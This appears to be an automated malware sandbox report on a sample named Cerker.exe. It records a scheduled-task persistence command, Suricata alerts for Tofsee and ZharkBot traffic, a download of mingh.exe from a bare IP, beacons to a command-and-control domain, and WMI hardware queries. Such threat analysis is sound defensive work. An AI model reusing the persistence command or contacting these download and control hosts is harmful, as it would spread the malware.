Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 9, 2024, 7:47 a.m. | Aug. 9, 2024, 7:51 a.m. |
-
-
schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F
2608 -
-
schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F
2768
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
fusionflow-meta.net | 172.67.162.233 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49165 -> 104.21.74.211:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49167 -> 104.21.74.211:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49166 -> 185.216.214.225:80 | 2054413 | ET MALWARE ZharkBot User-Agent Observed | A Network Trojan was detected |
TCP 192.168.56.101:49166 -> 185.216.214.225:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic |
TCP 185.216.214.225:80 -> 192.168.56.101:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 185.216.214.225:80 -> 192.168.56.101:49166 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49165 104.21.74.211:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=fusionflow-meta.net | 28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a |
TLSv1 192.168.56.101:49167 104.21.74.211:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=fusionflow-meta.net | 28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a |
suspicious_features | Connection to IP address | suspicious_request | GET http://185.216.214.225/mingh.exe |
request | GET http://185.216.214.225/mingh.exe |
request | GET https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 |
request | GET https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9BD4 |
description | Cerker.exe tried to sleep 230 seconds, actually delayed analysis time by 230 seconds |
file | C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe |
cmdline | C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F |
file | C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe |
wmi | SELECT * FROM Win32_Processor |
wmi | SELECT * FROM Win32_BaseBoard |
wmi | SELECT * FROM Win32_DiskDrive |